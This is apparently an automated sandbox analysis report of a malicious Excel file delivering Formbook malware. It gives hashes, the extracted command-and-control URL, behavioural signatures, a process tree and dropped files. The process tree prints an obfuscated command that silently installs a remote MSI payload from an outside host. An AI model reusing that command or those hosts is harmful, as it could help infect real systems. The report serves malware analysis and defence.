Analysis
- max time kernel: 152s
- max time network: 153s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 07-05-2021 12:17
Behavioral task: behavioral1
- Sample: fadb21a70ab5923cbe8e8deeb36af5e07efd0e87.xls
- Resource: win7v20210408
General
- Target: fadb21a70ab5923cbe8e8deeb36af5e07efd0e87.xls
- Size: 37KB
- MD5: abc73f6301b9f828dce46943b7111f29
- SHA1: fadb21a70ab5923cbe8e8deeb36af5e07efd0e87
- SHA256: ac0ccf59d64faf079e0d4e93ec994865214aefd0899f644da81f8e748e4ee153
- SHA512: 00f1499e6db64cf9bc94bba3a90382f5b045a3e291e65ef8db68a916cf586353d48ac7509c30c14c0da1b1557ac96ba60cf2a5214321395892473634dc56b813
Malware Config
Extracted
formbook
4.1
http://www.craftsman-vail.com/cca/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- cmd.exe (pid 1996), target process EXCEL.EXE (pid_target 1920): Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process
-
Formbook Payload 2 IoCs
Processes:
- behavioral1/memory/1060-75-0x0000000000400000-0x000000000042E000-memory.dmp: yara_rule formbook
- behavioral1/memory/1092-82-0x00000000000C0000-0x00000000000EE000-memory.dmp: yara_rule formbook
-
Blocklisted process makes network request 1 IoCs
Processes:
- flow 7: pid 1784, msiexec.exe
-
Executes dropped EXE 2 IoCs
Processes:
- pid 768: MSI8DC2.tmp
- pid 1060: MSI8DC2.tmp
-
Loads dropped DLL 1 IoCs
Processes:
- pid 768: MSI8DC2.tmp
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
- pid 1540: msiexec.exe
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
- msiexec.exe: File opened (read-only) \??\S:, \??\A:, \??\L:, \??\M:, \??\Z:, \??\T:, \??\V:, \??\E:, \??\F:, \??\I:, \??\J:, \??\N:, \??\O:, \??\X:, \??\R:, \??\U:, \??\B:, \??\G:, \??\H:, \??\K:, \??\P:, \??\Q:, \??\W:, \??\Y:
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
- PID 768 set thread context of 1060 (pid 768, process MSI8DC2.tmp, target process MSI8DC2.tmp)
- PID 1060 set thread context of 1252 (pid 1060, process MSI8DC2.tmp, target process Explorer.EXE)
- PID 1092 set thread context of 1252 (pid 1092, process colorcpl.exe, target process Explorer.EXE)
-
Drops file in Windows directory 6 IoCs
Processes:
- msiexec.exe: File opened for modification C:\Windows\Installer\MSI8DC2.tmp
- msiexec.exe: File opened for modification C:\Windows\Installer\f748b11.ipi
- msiexec.exe: File opened for modification C:\Windows\Installer\MSI870B.tmp
- msiexec.exe: File created C:\Windows\Installer\f748b11.ipi
- msiexec.exe: File opened for modification C:\Windows\Installer\
- msiexec.exe: File opened for modification C:\Windows\Installer\MSI8D43.tmp
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
Processes:
- C:\Windows\Installer\MSI8DC2.tmp: yara_rule nsis_installer_1
- C:\Windows\Installer\MSI8DC2.tmp: yara_rule nsis_installer_2
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
- EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor
-
Modifies Internet Explorer settings
Processes:
- EXCEL.EXE: Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"
- EXCEL.EXE: Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
- EXCEL.EXE: Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"
- EXCEL.EXE: Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"
- EXCEL.EXE: Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"
- EXCEL.EXE: Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar
- EXCEL.EXE: Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt
- EXCEL.EXE: Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
- EXCEL.EXE: Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"
-
Modifies data under HKEY_USERS 1 IoCs
Processes:
- msiexec.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
- pid 1920: EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
- pid 1784: msiexec.exe
- pid 1060: MSI8DC2.tmp
- pid 1092: colorcpl.exe
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
- pid 768: MSI8DC2.tmp
- pid 1060: MSI8DC2.tmp
- pid 1092: colorcpl.exe
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
- pid 1540, msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
- pid 1784, msiexec.exe: SeRestorePrivilege, SeTakeOwnershipPrivilege, SeSecurityPrivilege
- pid 1060, MSI8DC2.tmp: SeDebugPrivilege
- pid 1252, Explorer.EXE: SeShutdownPrivilege
- pid 1092, colorcpl.exe: SeDebugPrivilege
-
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
- pid 1920: EXCEL.EXE
- pid 1252: Explorer.EXE
-
Suspicious use of SendNotifyMessage 19 IoCs
Processes:
- pid 1252: Explorer.EXE
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
- pid 1920: EXCEL.EXE
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
- PID 1920 wrote to memory of 1996 (pid 1920, process EXCEL.EXE, target process cmd.exe)
- PID 1996 wrote to memory of 1540 (pid 1996, process cmd.exe, target process msiexec.exe)
- PID 1784 wrote to memory of 768 (pid 1784, process msiexec.exe, target process MSI8DC2.tmp)
- PID 768 wrote to memory of 1060 (pid 768, process MSI8DC2.tmp, target process MSI8DC2.tmp)
- PID 1252 wrote to memory of 1092 (pid 1252, process Explorer.EXE, target process colorcpl.exe)
- PID 1092 wrote to memory of 1264 (pid 1092, process colorcpl.exe, target process cmd.exe)
Processes
-
C:\Windows\Explorer.EXE, command line: C:\Windows\Explorer.EXE (process tree level 1)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE, command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\fadb21a70ab5923cbe8e8deeb36af5e07efd0e87.xls (process tree level 2)
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe, command line: "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/tfv88791.msi /qn (process tree level 3)
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe, command line: mSiExec /i http://farm-finn.com/admin/tfv88791.msi /qn (process tree level 4)
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\colorcpl.exe, command line: "C:\Windows\SysWOW64\colorcpl.exe" (process tree level 2)
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe, command line: /c del "C:\Windows\Installer\MSI8DC2.tmp" (process tree level 3)
-
C:\Windows\system32\msiexec.exe, command line: C:\Windows\system32\msiexec.exe /V (process tree level 1)
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSI8DC2.tmp, command line: "C:\Windows\Installer\MSI8DC2.tmp" (process tree level 2)
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSI8DC2.tmp, command line: "C:\Windows\Installer\MSI8DC2.tmp" (process tree level 3)
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\Windows\Installer\MSI8DC2.tmp
- MD5: caccaec6ca54e341eb266b3b98978178
- SHA1: e02d383072613e1e65a8991adc941b65a82f8be7
- SHA256: 20b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479
- SHA512: 838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e
-
\Users\Admin\AppData\Local\Temp\nsx8E8A.tmp\0djwv1e4o91gu5.dll
- MD5: b8efcf07411a1081f73080bd83f3bf1e
- SHA1: b534be3372f363f2ae50be8fa8fd94fec8c0dae2
- SHA256: 7faeba7a3e10c3eccd92d119327a0d7e8b0aa99c7ca956326bff1c83ce011440
- SHA512: 3ba6a145c27d62f4d8cfea644945a86d1321e61e0677bae217cc5003f4fad486e56481354f8fd7c46aceea69c6f1824b8efbe17461e319a48940d8b63a53f79c